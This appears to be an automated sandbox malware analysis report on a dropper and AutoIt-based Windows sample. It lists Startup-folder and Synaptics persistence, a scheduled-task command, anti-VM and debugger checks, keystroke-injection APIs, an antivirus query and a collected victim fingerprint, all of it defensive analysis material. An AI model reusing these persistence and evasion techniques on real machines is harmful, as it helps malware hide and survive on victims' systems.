                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe API coverage: 6.4 %
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe API coverage: 3.7 %
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe API coverage: 3.7 %
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe TID: 7964 Thread sleep time: -48000s >= -30000s
                            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 3712 Thread sleep time: -900000s >= -30000s
                            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 6288 Thread sleep time: -4560000s >= -30000s
                            Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 2220 Thread sleep time: -60000s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Last function: Thread delayed
                            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                            Source: C:\ProgramData\Synaptics\Synaptics.exe Last function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Thread sleep count: Count: 4800 delay: -10
                            Source: Yara match File source: 00000004.00000002.2732607207.0000000004372000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 0000000B.00000002.2718201933.0000000002A70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 0000000B.00000002.2719329795.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: 0000000B.00000002.2719329795.0000000002B88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: ._cache_Google.exe PID: 7960, type: MEMORYSTR
                            Source: Yara match File source: Process Memory Space: wscript.exe PID: 8176, type: MEMORYSTR
                            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, type: DROPPED
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_004CDD92 GetFileAttributesW,FindFirstFileW,FindClose,4_2_004CDD92
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_00502044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_00502044
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_0050219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,4_2_0050219F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_005024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,4_2_005024A9
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_004F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,4_2_004F6B3F
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_004F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,4_2_004F6E4A
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_004FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,4_2_004FF350
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_004FFD47 FindFirstFileW,FindClose,4_2_004FFD47
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exe Code function: 4_2_004FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,4_2_004FFDD2
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe Code function: 13_2_00C92044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00C92044
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe Code function: 13_2_00C9219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00C9219F
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe Code function: 13_2_00C924A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,13_2_00C924A9
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C86B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,13_2_00C86B3F
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C86E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,13_2_00C86E4A
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C8F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,13_2_00C8F350
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C8FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,13_2_00C8FDD2
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C5DD92 GetFileAttributesW,FindFirstFileW,FindClose,13_2_00C5DD92
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C8FD47 FindFirstFileW,FindClose,13_2_00C8FD47
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B12044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,32_2_00B12044
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B1219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,32_2_00B1219F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B124A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,32_2_00B124A9
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B06B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,32_2_00B06B3F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B06E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,32_2_00B06E4A
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B0F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,32_2_00B0F350
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00ADDD92 GetFileAttributesW,FindFirstFileW,FindClose,32_2_00ADDD92
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B0FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,32_2_00B0FDD2
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B0FD47 FindFirstFileW,FindClose,32_2_00B0FD47
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004CE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,4_2_004CE47B
                            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000
                            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000
                            Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW m]%SystemRoot%\system32\mswsock.dll
                            Source: TCPKPY.exe, 00000017.00000003.1711603024.000000000090A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                            Source: TCPKPY.exe, 00000017.00000003.1711603024.000000000090A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\r
                            Source: wscript.exe, 00000000.00000003.1492572739.000001C7E50D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1495561900.000001C7E50D0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%\system32\dnsapi.dll,-103
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW=
                            Source: wscript.exe, 00000000.00000003.1491439603.000001C7E28BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1495274061.000001C7E28D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1491533263.000001C7E28D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                            Source: TCPKPY.exe, 00000017.00000003.1711603024.000000000090A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Q
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeAPI call chain: ExitProcess graph end nodegraph_4-105197
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeAPI call chain: ExitProcess graph end nodegraph_4-105611
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeProcess information queried: ProcessInformation
                            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPort
                            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPort
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_0050703C BlockInput,4_2_0050703C
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004B374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,4_2_004B374E
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004E46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,4_2_004E46D0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_005120F6 LoadLibraryA,GetProcAddress,4_2_005120F6
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004DA937 GetProcessHeap,4_2_004DA937
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004D8E19 SetUnhandledExceptionFilter,4_2_004D8E19
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004D8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004D8E3C
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C68E19 SetUnhandledExceptionFilter,13_2_00C68E19
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C68E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00C68E3C
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AE8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00AE8E3C
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00AE8E19 SetUnhandledExceptionFilter,32_2_00AE8E19

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Windows\System32\wscript.exeFile created: Machine-PO[1].exe.0.dr
                            Source: C:\Windows\System32\wscript.exeNetwork Connect: 23.109.93.100 443
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004EBE95 LogonUserW,4_2_004EBE95
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004B374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,4_2_004B374E
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004F4B52 SendInput,keybd_event,4_2_004F4B52
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004F7DD5 mouse_event,4_2_004F7DD5
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess created: C:\Users\user\AppData\Local\Temp\._cache_Google.exe "C:\Users\user\AppData\Local\Temp\._cache_Google.exe"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe"
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004EB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,4_2_004EB398
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004EBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,4_2_004EBE31
                            Source: ._cache_Google.exeBinary or memory string: Shell_TrayWnd
                            Source: wscript.exe, 00000000.00000003.1489655298.000001C7E57E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1489714337.000001C7E57E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1490195306.000001C7E57E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: udeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                            Source: wscript.exe, 00000000.00000003.1488585616.000001C7E5620000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1490310469.000001C7E530E000.00000004.00000020.00020000.00000000.sdmp, Google.exe, 00000003.00000000.1491062963.0000000000566000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004D7254 cpuid 4_2_004D7254
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004D40DA GetSystemTimeAsFileTime,__aulldiv,4_2_004D40DA
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_0052C146 GetUserNameW,4_2_0052C146
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004E2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,4_2_004E2C3C
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 4_2_004CE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,4_2_004CE47B
                            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                            Stealing of Sensitive Information

                            Source: Yara matchFile source: Process Memory Space: ._cache_Google.exe PID: 7960, type: MEMORYSTR
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: 3.0.Google.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000003.1489443918.000001C7E5723000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1491842358.000001C7E51B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1488585616.000001C7E54BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7732, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Google.exe PID: 7912, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX4FAD.tmp, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, type: DROPPED
                            Source: ._cache_Google.exe, 00000022.00000003.2151985070.000000000496A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                            Source: ._cache_Google.exeBinary or memory string: WIN_XP
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 204748952|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta48985]204748984]204749031N
                            Source: TCPKPY.exe, 0000001C.00000003.1855066305.000000000424C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81&
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|EM`T%
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|?
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|>
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta\R
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta:SystemRoot=C:\Windows
                            Source: ._cache_Google.exeBinary or memory string: WIN_7
                            Source: ._cache_Google.exeBinary or memory string: WIN_8
                            Source: TCPKPY.exe, 00000017.00000003.1761569209.00000000043B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81:
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta.
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|betawR
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|betaPQ
                            Source: ._cache_Google.exe, 00000004.00000002.2732607207.0000000004353000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_814
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|betai
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 204748974|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta,Q
                            Source: TCPKPY.exe, 00000025.00000000.2273762415.0000000000CEE000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 204748942|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|ms
                            Source: TCPKPY.exe, 0000000D.00000003.1611693531.00000000040AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81Tq
                            Source: TCPKPY.exe, 00000016.00000002.1719077320.0000000004653000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81H
                            Source: ._cache_Google.exeBinary or memory string: WIN_XPe
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta48985]204748977]204748977
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|nN
                            Source: ._cache_Google.exeBinary or memory string: WIN_VISTA
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|
                            Source: ._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|192.168.2.8|ddd|Pr1024X21280X3|Desktop|0|beta;dword mingap;86757984\Q
                            Source: ._cache_Google.exe, 00000004.00000002.2722530892.0000000000F67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x|nlrlsu|x|user|WIN_81|X64| |Windows Defender|EM`
                            Source: ._cache_Google.exe, 00000020.00000003.1946889559.0000000004875000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81O
